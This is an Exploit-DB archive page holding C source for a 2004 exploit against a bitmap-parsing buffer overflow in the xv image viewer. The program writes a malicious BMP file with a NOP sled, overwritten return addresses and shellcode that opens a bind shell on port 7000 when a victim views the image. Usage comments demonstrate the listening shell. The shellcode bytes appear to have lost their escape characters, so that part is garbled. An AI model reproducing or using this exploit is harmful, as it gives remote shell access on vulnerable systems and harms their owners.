https://www.exploit-db.com/exploits/405

漏洞细节尚未披露

/* 
* xv exploit for the bmp parsing buffer overflow 
* 
* infamous42md AT hotpop DOT com 
* PEOPLE STOP EMAILING MY BUGTRAQ ADDRESS AND USE THIS ONE!! 
* 
* [n00b_at_localho.outernet] gcc -Wall xv_bmpslap.c 
* [n00b_at_localho.outernet] ./a.out 
* Usage: ./a.out < retaddr > [ align ] 
* [n00b_at_localho.outernet] ./a.out 0xbffff388 
* [n00b_at_localho.outernet] netstat -ant | grep 7000 
* [n00b_at_localho.outernet] ./xv suckit.bmp 
* [n00b_at_localho.outernet] netstat -ant | grep 7000 
* tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN 
    * 
*/ 
#include <stdio.h> 
#include <sys/types.h> 
#include <fcntl.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <string.h> 
#include <netinet/in.h> 



#define ALIGN 0 
#define NOP 0x90 
#define NNOPS 256 
#define die(x) do{perror(x); exit(EXIT_FAILURE);}while(0) 
#define BS 0x10000 
#define OUTFILE "suckit.bmp" 
#define OVERWRITE_BYTES 700 



/* a bitmap header structure */ 
#define BMP_HDR_SZ sizeof(struct bmp) 
struct bmp { 
    u_char type[2]; 
    u_int bfsize, 
            reserved, 
            offbits, 
            bisize, /* 40 */ 
            width, 
            height; 
    u_short planes, /* 1 */ 
            bitcount; /* 4 */ 
    u_int compres, /* != 1 */ 
            szimg, 
            xppm, 
            ypppm, 
            clrused, /* write length */ 
            clrimportant; 
} __attribute__ ((packed)); 



/* for easy access */ 
typedef union _ret { 
    u_long ret; 
    u_char retb[sizeof(u_long)]; 
} ret_t; 



/* call them on port 7000, mine */ 
char remote[] = 
"x31xc0x50x50x66xc7x44x24x02x1bx58xc6x04x24x02x89xe6" 
"xb0x02xcdx80x85xc0x74x08x31xc0x31xdbxb0x01xcdx80x50" 
"x6ax01x6ax02x89xe1x31xdbxb0x66xb3x01xcdx80x89xc5x6a" 
"x10x56x50x89xe1xb0x66xb3x02xcdx80x6ax01x55x89xe1x31" 
"xc0x31xdbxb0x66xb3x04xcdx80x31xc0x50x50x55x89xe1xb0" 
"x66xb3x05xcdx80x89xc5x31xc0x89xebx31xc9xb0x3fxcdx80" 
"x41x80xf9x03x7cxf6x31xc0x50x68x2fx2fx73x68x68x2fx62" 
"x69x6ex89xe3x50x53x89xe1x99xb0x0bxcdx80xa1x5fx66x6ex69"; 
    


void make_bmp(char *buf, int len) 
{ 
    int fd = 0; 


    /* create the 3vil file */ 
    if( (fd = open(OUTFILE, O_RDWR|O_CREAT, 0666)) < 0) 
        die("open"); 
    
    if(write(fd, buf, len) < 0) 
        die("write"); 


    close(fd); 
} 


/* 
* 
*/ 
int main(int argc, char **argv) 
{ 
    int len, x, align = ALIGN; 
    char buf[BS]; 
    ret_t retaddr; 
    struct bmp bmp; 
  
    if(argc < 2){ 
        fprintf(stderr, "tUsage: %s < retaddr > [ align ]n", argv[0]); 
        return EXIT_FAILURE; 
    } 
    if(argc > 2){ 
        align = atoi(argv[2]); 
        if(align < 0 || align > 3) 
            die("get bent bitch"); 
    } 
    sscanf(argv[1], "%lx", &retaddr.ret); 


    /* setup bitmap */ 
    memset(&bmp, 0, BMP_HDR_SZ); 
    bmp.type[0] = 'B', bmp.type[1] = 'M'; 
    bmp.bisize = 40; 
    bmp.bitcount = 4; 
    bmp.clrused = OVERWRITE_BYTES; 
    bmp.planes = 1; 
    
    /* create 3vil buf */ 
    memset(buf, NOP, BS); 
    memcpy(buf, &bmp, BMP_HDR_SZ); 
    len = BMP_HDR_SZ; 
    len += align; 
    
    /* fill in ret address starting at byte offset 0, every other 4 bytes */ 
    for(x = 0; x < OVERWRITE_BYTES; x++) 
        buf[len + (x*4)] = retaddr.retb[x & 0x3]; 


    /* fill in shell after NOPS, at byte offset 2, every other 4 bytes */ 
    for(x = 0; x < strlen(remote); x++) 
        buf[len + (NNOPS*4) + (x*4) + 2] = remote[x]; 


    /* extra */ 
    len += OVERWRITE_BYTES * 10; 
    make_bmp(buf, len); 


    return 0; 
}

// milw0rm.com [2004-08-20]